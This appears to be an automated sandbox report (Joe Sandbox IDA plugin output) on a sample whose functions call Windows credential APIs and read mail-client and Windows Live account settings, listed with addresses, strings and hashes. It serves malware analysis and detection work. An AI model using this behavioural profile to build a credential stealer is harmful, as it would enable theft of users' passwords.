                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                      • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                      APIs
                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                      Strings
                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                      • API String ID: 1640410171-2022683286
                                                                                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                      APIs
                                                                                        • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                      • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                      • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$strlen
                                                                                      • String ID: -journal$-wal$immutable$nolock
                                                                                      • API String ID: 2619041689-3408036318
                                                                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$strlen
                                                                                      • String ID:
                                                                                      • API String ID: 667451143-3916222277
                                                                                      • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                      • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                      • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                      • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                      APIs
                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                      • String ID: J$Microsoft_WinInet
                                                                                      • API String ID: 3318079752-260894208
                                                                                      • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                      • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                      APIs
                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                      • API String ID: 888011440-2039793938
                                                                                      • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                      • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                      APIs
                                                                                      Strings
                                                                                      • too many attached databases - max %d, xrefs: 0042E951
                                                                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                      • unable to open database: %s, xrefs: 0042EBD6
                                                                                      • out of memory, xrefs: 0042EBEF
                                                                                      • database %s is already in use, xrefs: 0042E9CE
                                                                                      • database is already attached, xrefs: 0042EA97
                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset
                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                      • API String ID: 1297977491-2001300268
                                                                                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                      APIs
                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                      • API String ID: 1348940319-1729847305
                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                      • API String ID: 3510742995-3273207271
                                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                      APIs
                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                      • memset.MSVCRT ref: 0040FA1E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                      • API String ID: 945165440-3589380929
                                                                                      • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                      • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                      • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                      • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                      APIs
                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                      • String ID: %s@gmail.com
                                                                                      • API String ID: 3261640601-4097000612
                                                                                      • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                      • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                      • String ID: sysdatetimepick32
                                                                                      • API String ID: 3411445237-4169760276
                                                                                      • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                      • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                      • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                      • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                        • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                        • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                        • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Item$DialogMessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 2485852401-0
                                                                                      • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                      • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                      • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                      • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                      • String ID:
                                                                                      • API String ID: 3642520215-0
                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                      • String ID:
                                                                                      • API String ID: 1999381814-0
                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemset
                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                      • API String ID: 1297977491-3883738016
                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                      APIs
                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memset
                                                                                      • String ID: gj
                                                                                      • API String ID: 438689982-4203073231
                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
